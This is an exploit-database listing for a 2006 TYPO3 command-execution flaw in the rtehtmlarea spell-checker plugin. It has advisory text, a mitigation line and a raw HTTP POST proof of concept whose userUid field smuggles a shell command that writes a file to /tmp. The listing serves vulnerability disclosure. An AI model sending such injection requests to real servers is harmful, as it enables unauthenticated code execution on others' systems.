header-logo
Suggest Exploit
vendor:
TYPO3
by:
SecurityFocus
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: TYPO3
Affected Version From: 4
Affected Version To: 4.1beta
Patch Exists: YES
Related CWE: N/A
CPE: typo3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

TYPO3 Multiple Vulnerabilities

TYPO3 is prone to multiple vulnerabilities that allow attackers to execute arbitrary commands. This issue occurs because the application fails to properly sanitize user-supplied data. Exploiting these issues allows unauthenticated attackers to execute arbitrary system commands with the privileges of the application.

Mitigation:

Ensure that user-supplied data is properly sanitized before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21680/info

TYPO3 is prone to multiple vulnerabilities that allow attackers to execute arbitrary commands. This issue occurs because the application fails to properly sanitize user-supplied data.

Exploiting these issues allows unauthenticated attackers to execute arbitrary system commands with the privileges of the application.

Versions 4.0 to 4.0.3 and 4.1beta are vulnerable; versions 3.7 and 3.8 are also vulnerable if they have the optional 'rtehtmlarea' extension installed.

POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.example.com
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+
/tmp/shell.txt+%23&enablePersonalDicts=true